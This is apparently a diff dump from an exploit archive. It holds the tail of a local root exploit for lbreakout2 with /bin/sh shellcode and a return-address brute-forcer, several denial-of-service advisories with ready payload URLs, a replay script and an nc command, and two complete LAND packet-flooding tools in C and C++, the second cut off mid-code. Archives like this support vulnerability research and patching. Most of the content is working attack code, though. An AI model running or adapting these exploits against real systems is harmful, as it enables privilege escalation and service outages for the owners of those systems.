"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char *buffer,*ptr;
int
main(int argc,char *argv[])
{
char * option_list = "br:s:";
int option,brute = 0,opterr = 0;
long ret,start = D_START;
if (argc < 2) banner(argv[0]);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(1);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
banner(argv[0]);
exit(1);
}
if(brute)
bruteforce(start);
return 0;
}
void
exec_vuln()
{
execl(PATH,PATH,NULL);
}
int
tease()
{
pid_t pid;
pid_t wpid;
int status;
pid = fork();
if (pid == -1)
{
fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno));
exit(13);
}
else if (pid == 0)
{
exec_vuln();
}
else
{
wpid = wait(&status);
if (wpid == -1)
{
fprintf(stderr,"[-] %s: wait()\n",strerror(errno));
return 1;
}
else if (wpid != pid)
abort();
else
{
if (WIFEXITED(status))
{
fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status));
return WEXITSTATUS(status);
}
else if (WIFSIGNALED(status))
return WTERMSIG(status);
else
fprintf(stderr,"[-] Stopped.\n");
}
}
return 1;
}
int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;
buffer = (char *)malloc(1024);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory\n");
exit(-1);
}
ret = ret_addr;
ptr = buffer;
memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
addr_ptr = (long *)ptr;
for(i=0;i<200;i++)
*(addr_ptr++) = ret;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME",buffer,1);
return 0;
}
int
bruteforce(long start)
{
int ret;
long i;
fprintf(stdout,"[+] Starting bruteforcing...\n");
for(i=start;i<0;i=i-50)
{
fprintf(stdout,"[+] Testing 0x%x...\n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
break;
}
}
return 0;
}
void
banner(char *argv)
{
fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n");
fprintf(stderr,"vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>\n");
fprintf(stderr,"usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\n",argv);
exit(1);
}

150
platforms/multiple/dos/10327.txt Executable file
View file

@ -0,0 +1,150 @@
Ghostscript is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input.
Exploiting this issue allows remote attackers to crash the application and possibly to execute code, but this has not been confirmed.
Vulnerable: Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 10_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_94
Sun OpenSolaris build snv_93
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_81
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_54
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_47
Sun OpenSolaris build snv_45
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
S.u.S.E. SUSE Linux Enterprise Server 9
S.u.S.E. SLE 11
S.u.S.E. SLE 10
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux Desktop 9
rPath rPath Linux 2
RedHat Fedora 9 0
RedHat Fedora 8 0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 3.0
Pardus Linux 2008 0
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
Ghostscript Ghostscript 8.15.2
Ghostscript Ghostscript 8.0.1
Ghostscript Ghostscript 8.61
Ghostscript Ghostscript 8.60
Ghostscript Ghostscript 8.57
Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Avaya Proactive Contact 3.0.2
Avaya Proactive Contact 4.1
Avaya Proactive Contact 4.0
Avaya Proactive Contact 3.0
Avaya Proactive Contact 0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server MM3.0
Avaya Messaging Storage Server 5.0
Avaya Messaging Storage Server 4.0
Avaya Messaging Storage Server 3.1
Avaya Messaging Storage Server 2.0
Avaya Messaging Storage Server 1.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking 3.1
Avaya Message Networking
Avaya Intuity AUDIX LX 2.0 SP2
Avaya Intuity AUDIX LX 2.0 SP1
Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)

10
platforms/multiple/dos/19212.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/267/info
A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks.
A malicious user can create a malformed like ",1" entry in the counter.log file by requesting a URL of the form "http://www.example.com/scripts/counter.exe?%0A". Any further attempt for request will result in an Access Violation in counter.exe.
A similar vulnerability exists if a user requests a URL of the form "http://www.example.com/scripts/counter.exe?AAAAA" with over 2200 A's.
All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued.

5
platforms/multiple/dos/19230.txt Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/288/info
Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press <Enter>".
Connect to tcp 5631. At the Please press <Enter> prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%.

49
platforms/multiple/dos/19780.txt Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/1013/info
Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager.
There are several ways for an attacker to cause various denial of service conditions.
Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.
Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.
It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.
It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:
04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan
The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.
If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.
It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.
cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"
cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-1.exe
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-2.exe
this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.
#!/bin/sh
(
sleep 2
echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt
Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <marc.ruef@computec.ch>. This tool is a pre-compiled Windows binary with Visual Basic source.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-3.zip

5
platforms/multiple/dos/19965.txt Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/1246/info
By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality.
http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$

9
platforms/multiple/dos/20239.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/1713/info
The OverView5 CGI interface by default is shipped with HP Openview Node Manager.
HP Openview Node Manager can be compromised due to an unchecked buffer. By sending a specially crafted GET request comprised of 136 bytes to the web services (default port 80) through the Overview5 CGI interface, the SNMP service will crash.
Successful exploitation, depending on the data entered, will allow the execution of arbitrary code.
http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid=<string of characters consisting of 136 bytes>

12
platforms/multiple/dos/20336.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/1868/info
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
eWave ServletExec is susceptible to a denial of service attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the web server is currently running, a java.net.BindException error will result thus halting all operations on the ServletExec engine. The web server is not affected by this vulnerability. Restarting the application is required in order to regain normal functionality.
http://target/servlet/ServletExec
or
nc 10.0.0.1 80
GET /servlet/ServletExec HTTP/1.0

24
platforms/multiple/dos/20659.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/2442/info
SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms.
A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.
Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server.
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer

381
platforms/multiple/dos/20810.c Executable file
View file

@ -0,0 +1,381 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
/*
* imland - improved multiple land
*
* A good spanking session requires several good, hard slaps.
*
* This program lands multiple land attacks on multiple hosts as a
* proof of concept of the oldly discovered but newly resurfaced
* M$ `land' attack vulnerability. It was written without ill intent to
* test a large range of servers for vulnerabilities in one go.
*
* If the targeted machines freeze up for 5-30 seconds for each packet,
* that means they are vulnerable.
*
* Disclaimer:
* This program was written without ill intent. It was designed to test
* and prove the effects of the LAND attack on multiple hosts at once.
* I am in no way responsible for what you do with this piece of code.
*
* Please use it responsibly to test your own servers only.
*
*/
#define _BSD_SOURCE
#define __FAVOR_BSD
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/* the attack packet */
struct raw_tcp_packet {
struct ip ip;
struct tcphdr tcp;
};
/* required to make the TCP checksum correct */
struct tcp_chksum_hdr {
struct in_addr src;
struct in_addr dest;
u_char zero;
u_char proto;
u_short len;
struct tcphdr tcp;
};
/* linked list with all we need, really */
typedef struct target {
struct sockaddr_in sa;
struct {
struct iphdr ip; /* included here so we can build them once */
struct tcphdr tcp; /* and thus transmit a tiny bit faster */
} pkt;
struct target *next;
} target;
/** prototypes **/
int send_land(int, struct target *);
void u_sleep(u_int);
int add_target_ip(char *, struct in_addr *, u_short);
u_int get_timevar(const char *);
int add_target(char *);
unsigned short chksum(unsigned short *, int);
void finish(int);
void crash(const char *, ...);
void usage(void);
/** external **/
extern int optind, opterr, optopt;
extern int h_errno;
extern char *optarg;
extern char *__progname;
/** global variables **/
target *list = NULL, *cursor = NULL;
int targets = 0;
int pkt_interval = 0; /* no delay by default */
int pkts = 1, pkts_sent = 0; /* send one per host by default */
int debug = 0;
u_short defport = 139; /* default port */
/** code start **/
void crash(const char *fmt, ...)
{
va_list ap;
printf("%s: ", __progname);
va_start(ap, fmt);
vprintf(fmt, ap);
va_end(ap);
if(errno) printf(": %s", strerror(errno));
puts("");
exit(3);
}
int main(int argc, char **argv)
{
target *host;
int sock, foo;
if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
crash("socket()");
while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) {
switch(foo) {
case 'v':
debug++;
break;
case 'i':
pkt_interval = get_timevar(optarg);
break;
case 'p':
defport = (u_short)strtoul(optarg, NULL, 0);
break;
case 'n':
pkts = strtoul(optarg, NULL, 0);
if(debug) printf("Sending %d packets\n", pkts);
break;
default:
add_target(optarg);
break;
}
}
argv = &argv[optind];
while(*argv) {
add_target(*argv);
argv++;
}
if(!targets) usage();
while(!pkts || pkts > pkts_sent) {
host = list;
while(host) {
printf("Sending to %s:%u ... ",
inet_ntoa(host->sa.sin_addr),
host->sa.sin_port);
foo = send_land(sock, host);
if(foo == - 1) printf("failed - %s\n", strerror(errno));
else printf("ok, landed %d bytes\n", foo);
if(pkt_interval) u_sleep(pkt_interval);
host = host->next;
}
pkts_sent++;
}
return 0;
}
/* build and send the land attack packet */
int send_land(int sock, struct target *host)
{
struct raw_tcp_packet pkt;
struct tcp_chksum_hdr tcc;
memset(&pkt, 0, sizeof(pkt));
memset(&tcc, 0, sizeof(tcc));
/* ip options */
pkt.ip.ip_v = IPVERSION;
pkt.ip.ip_hl = sizeof(struct iphdr) / 4;
pkt.ip.ip_tos = 0;
pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
pkt.ip.ip_off = htons(IP_DF);
pkt.ip.ip_ttl = 0xff;
pkt.ip.ip_p = IPPROTO_TCP;
pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr;
pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr));
tcc.src = tcc.dest = host->sa.sin_addr;
tcc.zero = 0;
tcc.proto = IPPROTO_TCP;
tcc.len = htons(sizeof(struct tcphdr));
tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port);
tcc.tcp.th_seq = htons(0x1d1);
tcc.tcp.th_off = sizeof(struct ip) / 4;
tcc.tcp.th_flags = TH_SYN;
tcc.tcp.th_win = htons(512);
memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr));
pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc));
return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa,
sizeof(struct sockaddr_in));
}
/* calculate checksum */
u_short chksum(u_short *p, int n)
{
register long sum = 0;
while(n > 1) {
sum += *p++;
n -= 2;
}
/* mop up the occasional odd byte */
if(n == 1) sum += *(u_char *)p;
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum = sum + (sum >> 16); /* add carry */
return ~sum; /* ones-complement, truncate */
}
/* usleep() the portable way. No error checking is done,
* so this might theoretically fail. */
void u_sleep(u_int u_sec)
{
struct timeval to;
fd_set readset, writeset;
if(debug > 3) printf("sleeping for %u microseconds\n", u_sec);
if(!u_sec) return;
to.tv_sec = u_sec / 1000000;
to.tv_usec = u_sec % 1000000;
FD_ZERO(&writeset);
FD_ZERO(&readset);
select(0, &readset, &writeset, NULL, &to);
return;
}
int add_target_ip(char *arg, struct in_addr *in, u_short port)
{
struct target *host;
/* disregard obviously stupid addresses */
if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY)
return -1;
if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port);
/* add the fresh ip */
host = malloc(sizeof(struct target));
if(!host) {
crash("add_target_ip(%s, %s): malloc(%d) failed",
arg, inet_ntoa(*in), sizeof(struct target));
}
memset(host, 0, sizeof(struct target));
/* fill out the sockaddr_in struct */
host->sa.sin_family = AF_INET;
host->sa.sin_addr.s_addr = in->s_addr;
host->sa.sin_port = port ? port : defport;
if(!list) list = host;
else cursor->next = host;
cursor = host;
targets++;
return 0;
}
/* wrapper for add_target_ip to resolve stuff as well */
int add_target(char *arg)
{
int i;
struct hostent *he;
struct in_addr *in, ip;
char *port_str;
u_short port = 0;
if(!arg) return -1;
if((port_str = strchr(arg, ':'))) {
*port_str = '\0';
port_str++;
if(*port_str) port = (u_short)strtoul(port_str, NULL, 0);
}
/* don't resolve if we don't have to */
if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port);
/* not an IP, so resolve */
errno = 0;
he = gethostbyname(arg);
if(!he && h_errno == TRY_AGAIN) {
u_sleep(500000);
he = gethostbyname(arg);
}
if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno));
/* add all the IP's as targets */
for(i = 0; he->h_addr_list[i]; i++) {
in = (struct in_addr *)he->h_addr_list[i];
add_target_ip(arg, in, port);
}
return 0;
}
/*
* u = micro
* m = milli
* s = seconds
* return value is in microseconds
*/
u_int get_timevar(const char *str)
{
char p, u, *ptr;
unsigned int len;
u_int i, d; /* integer and decimal, respectively */
u_int factor = 1000; /* default to milliseconds */
if(!str) return 0;
len = strlen(str);
if(!len) return 0;
/* unit might be given as ms|m (millisec),
* us|u (microsec) or just plain s, for seconds */
u = p = '\0';
u = str[len - 1];
if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2];
if(p && u == 's') u = p;
else if(!p) p = u;
if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p);
if(u == 'u') factor = 1; /* microseconds */
else if(u == 'm') factor = 1000; /* milliseconds */
else if(u == 's') factor = 1000000; /* seconds */
if(debug > 3) printf("factor is %u\n", factor);
i = strtoul(str, &ptr, 0);
if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1)
return i * factor;
/* time specified in usecs can't have decimal points, so ignore them */
if(factor == 1) return i;
d = strtoul(ptr + 1, NULL, 0);
/* d is decimal, so get rid of excess baggage */
while(d >= factor) d /= 10;
/* the last parenthesis avoids floating point exceptions. */
return ((i * factor) + (d * (factor / 10)));
}
void usage(void)
{
printf("Usage: %s -i <interval> -p <port> -n <pkts> host1:port1 hostn:portn\n\n",
__progname);
printf("-i sets packet interval in milliseconds.\n");
printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n");
printf(" Default is 0, which is good for multiple hosts and one packet.\n");
printf(" If you want to send continuously, specify 1s or more, so as to not\n");
printf(" cause DoS due to sheer traffic volume.\n\n");
printf("-p sets the DEFAULT port (139 if not specified)\n\n");
printf("-n determines how many packets to send to each target. Default is 1\n\n");
printf("host:port combinations can be given as such; 207.46.130.108:80\n");
printf("The port part of a target definition ovverrides the defaults.\n\n");
printf("Hostnames will be resolved, if possible.\n");
exit(1);
}

247
platforms/multiple/dos/20811.cpp Executable file
View file

@ -0,0 +1,247 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
//
// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
//
// Written by: Konrad Malewski.
//
#include <stdlib.h>
#include <stdio.h>
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////////////////////////////////////////////////////////////////////////
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN 0x6
typedef unsigned char u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int u_int32_t;
typedef unsigned __int64 u_int64_t;
/*
* Ethernet II header
* Static header size: 14 bytes
*/
struct libnet_ethernet_hdr
{
u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
u_int16_t ether_type; /* protocol */
};
struct libnet_in6_addr
{
union
{
u_int8_t __u6_addr8[16];
u_int16_t __u6_addr16[8];
u_int32_t __u6_addr32[4];
} __u6_addr; /* 128-bit IP6 address */
};
/*
* IPv6 header
* Internet Protocol, version 6
* Static header size: 40 bytes
*/
struct libnet_ipv6_hdr
{
u_int8_t ip_flags[4]; /* version, traffic class, flow label */
u_int16_t ip_len; /* total length */
u_int8_t ip_nh; /* next header */
u_int8_t ip_hl; /* hop limit */
struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
};
/*
* TCP header
* Transmission Control Protocol
* Static header size: 20 bytes
*/
struct libnet_tcp_hdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
u_int8_t th_x2:4, /* (unused) */
th_off:4; /* data offset */
u_int8_t th_flags; /* control flags */
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};
int libnet_in_cksum(u_int16_t *addr, int len)
{
int sum;
union
{
u_int16_t s;
u_int8_t b[2];
}pad;
sum = 0;
while (len > 1)
{
sum += *addr++;
len -= 2;
}
if (len == 1)
{
pad.b[0] = *(u_int8_t *)addr;
pad.b[1] = 0;
sum += pad.s;
}
return (sum);
}
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
u_char errbuf[1024];
pcap_t *pcap_handle;
void usage(char* n)
{
pcap_if_t * alldevs,*d;
int i=1;
fprintf(stdout,"Usage:\n"
"\t %s <device> <victim> <port>\n",n);
if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
{
fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
exit(EXIT_FAILURE);
}
printf("Avaliable adapters: \n");
d = alldevs;
while (d!=NULL)
{
printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
d = d->next;
}
pcap_freealldevs (alldevs);
}
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
if ( argc<4 )
{
usage(argv[0]);
return EXIT_FAILURE;
}
int retVal;
struct addrinfo hints,*addrinfo;
ZeroMemory(&hints,sizeof(hints));
WSADATA wsaData;
if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
{
fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
return EXIT_FAILURE;
}
//
// Get MAC address of remote host (assume link local IpV6 address)
//
hints.ai_family = PF_INET6;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
hints.ai_flags = AI_PASSIVE;
retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
if ( retVal!=0 )
{
WSACleanup();
fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
exit(EXIT_FAILURE);
}
//
// Open WinPCap adapter
//
if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
{
freeaddrinfo(addrinfo);
WSACleanup();
fprintf(stderr, "Error opening device: %s\n",argv[1]);
return EXIT_FAILURE;
}
ZeroMemory(packet,sizeof(packet));
struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
// fill ethernet header
eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
